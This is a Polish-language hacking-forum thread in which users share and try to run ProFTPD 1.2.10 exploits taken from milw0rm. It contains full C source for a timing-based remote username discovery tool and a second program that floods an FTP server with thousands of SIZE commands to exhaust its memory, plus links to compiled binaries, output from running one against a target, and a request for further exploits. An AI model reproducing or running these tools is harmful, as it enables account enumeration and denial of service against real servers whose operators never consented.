exploit: http://www.milw0rm.com/exploits/581
przy kompilacji w borland c++ builder pojawiaja sie bledy:
przy kompilacji w borland c++ builder pojawiaja sie bledy:
prosze o pomoc.
proftpd 1.2.10 exploit
- Thread starter garek
- Rozpoczęty
Volkerbird
Użytkownik
- Dołączył
- Grudzień 12, 2006
- Posty
- 61
Wydaję mi się, że program jest źle napisany. Na początku nie może wczytać bibliotek np. syssocket.h.
Kod:
#include <sys/socket.h>
#include <sys/types.h>
#include <stdio.h>
#include <arpa/inet.h>
#include <sys/time.h>
#define PORT 21
#define PROBE 8
main (int argc, char **argv)
{
int sock,n,y;
long dist,stat=0;
struct sockaddr_in sin;
char buf[1024], buf2[1024];
struct timeval tv, tv2;
struct timezone tz, tz2;
printf ("Proftpd remote users discovery exploitn"
" Coded by Leon / LSS Securityn"
">-------------------------------------<n");
if (argc != 3) { printf ("usage: %s ",argv[0]); exit(0); }
sock = socket (AF_INET, SOCK_STREAM, 0);
sin.sin_family = AF_INET;
sin.sin_port = htons (PORT);
sin.sin_addr.s_addr = inet_addr (argv[1]);
bzero (sin.sin_zero,8);
connect (sock, (struct sockaddr*)&sin, sizeof(struct sockaddr));
printf ("Login time: ");
n = read (sock,buf2, sizeof(buf2));
for (y=0;y<PROBE;y++) {
gettimeofday (&tv,&tz);
snprintf (buf, sizeof(buf)-1,"USER %srn",argv[2]);
write (sock, buf, strlen(buf));
n = read (sock,buf2, sizeof(buf2));
gettimeofday (&tv2,&tz2);
dist =tv2.tv_usec - tv.tv_usec;
stat += dist;
printf (" %d |",dist);
}
printf ("nAvrg: %dn",(stat/PROBE));
close (sock);
}compiled http://nitrox.fasthost.pl/proftpd
a tu bonusik :
Kod:
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
#include <time.h>
#include <string.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>
#include <netdb.h>
#define USERNAME "login"
#define PASSWORD "haslo"
#define HOWMANY 10000
void logintoftp();
void sendsizes();
int fd;
struct in_addr host;
unsigned short port = 21;
int tcp_connect(struct in_addr addr,unsigned short port);
int main(int argc, char **argv)
{
if (!resolve(argv[1],&host))
{
fprintf(stderr,"Hostname lookup failuren");
exit(0);
}
fd=tcp_connect(host,port);
logintoftp(fd);
printf("Loggedn");
sendsizes(fd);
printf("Now check out memory usage of proftpd daemon");
printf("Resident set size (RSS) and virtual memory size (VSIZE)");
printf("fields in ps output");
}
void logintoftp()
{
char snd[1024], rcv[1024];
int n;
printf("Logging " USERNAME "/" PASSWORD "rn");
memset(snd, '0', 1024);
sprintf(snd, "USER %srn", USERNAME);
write(fd, snd, strlen(snd));
while((n=read(fd, rcv, sizeof(rcv))) > 0)
{
rcv[n] = 0;
if(strchr(rcv, 'n') != NULL)break;
}
memset(snd, '0', 1024);
sprintf(snd, "PASS %srn", PASSWORD);
write(fd, snd, strlen(snd));
while((n=read(fd, rcv, sizeof(rcv))) > 0)
{
rcv[n] = 0;
if(strchr(rcv, 'n') != NULL)
break;
}
return;
}
void sendsizes()
{
char snd[1024], rcv[1024];
unsigned long loop;
printf ("Sending %i size commands... n", HOWMANY);
for(loop=0;loop<HOWMANY;loop++)
{
sprintf(snd, "SIZE /dadasjasojdasj/adhjaodhahasohasaoihroahan");
write(fd, snd, strlen(snd));
}
return;
}
int tcp_connect(struct in_addr addr,unsigned short port)
{
int fd;
struct sockaddr_in serv;
bzero(&serv,sizeof(serv)); serv.sin_addr=addr;
serv.sin_port=htons(port);
serv.sin_family=AF_INET;
if ((fd=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP)) < 0)
{
perror("socket");
exit(0);
}
if (connect(fd,(struct sockaddr *)&serv,sizeof(serv)) < 0)
{
perror("connect");
exit(0);
}
return(fd);
}
int resolve(char *hostname,struct in_addr *addr)
{
struct hostent *res;
res=gethostbyname(hostname);
if (res==NULL)
return(0);
memcpy((char *)addr,res->h_addr,res->h_length);
return(1);
}compiled http://nitrox.fasthost.pl/proftpd2
Nie chce otwierac nowego topica wiec napisz tu:
odpalilem exploita (tego pierwszego) pod cygwin. ale nie wiem zbytnio co dalej. czy moglby ktos mi podpowiedziec? dostaje takie dane:
czy to moze sie nadac? czy to innaczej jakos trzeba wywolac? wywoluje przez:
odpalilem exploita (tego pierwszego) pod cygwin. ale nie wiem zbytnio co dalej. czy moglby ktos mi podpowiedziec? dostaje takie dane:
Kod:
Proftpd remote users discovery exploit
Coded by Leon / LSS Security
>-------------------------------------<
Login time: 102000 | 46000 | 49000 | 46000 | 110000 | 47000 | 47000 | 49000 |
Avrg: 62000czy to moze sie nadac? czy to innaczej jakos trzeba wywolac? wywoluje przez:
Kod:
./pftpd IP 21wystarczy zerknac na kod i stwierdzic mozna smialo ze jakis debil napisal goffno dygnol na milworma a tak naprawde to nic nie robi
, ten drugi rowniez jest zdygany
, napisac mozna jakikolwiek current list i bedzie na kazdym servie to samo wyszukiwac
podejzewam ze admin milw0rma nie ma pojecia o programowaniu to nie pierwsze exploity ktore nigdy nic nie zrobia [;
looknijcie na exploity dla novella directory no przeciez to jest smiech na sali
podejzewam ze admin milw0rma nie ma pojecia o programowaniu to nie pierwsze exploity ktore nigdy nic nie zrobia [;
looknijcie na exploity dla novella directory no przeciez to jest smiech na sali
no wlasnie tak nie bardzo rozumialem co moze sie dziac w tym kodzie... bo chcialem przepisac go (wstyt sie przyznawac ;P) na VB ale poniewaz nie kumalem co on moze robic to wpierw skompilowalem go pod cygwin'em... A miał by ktoś może jakiegoś exploita pod proftpd 1.2.10 ?Originally posted by Hunter
wystarczy zerknac na kod i stwierdzic mozna smialo ze jakis debil napisal goffno dygnol na milworma a tak naprawde to nic nie robi...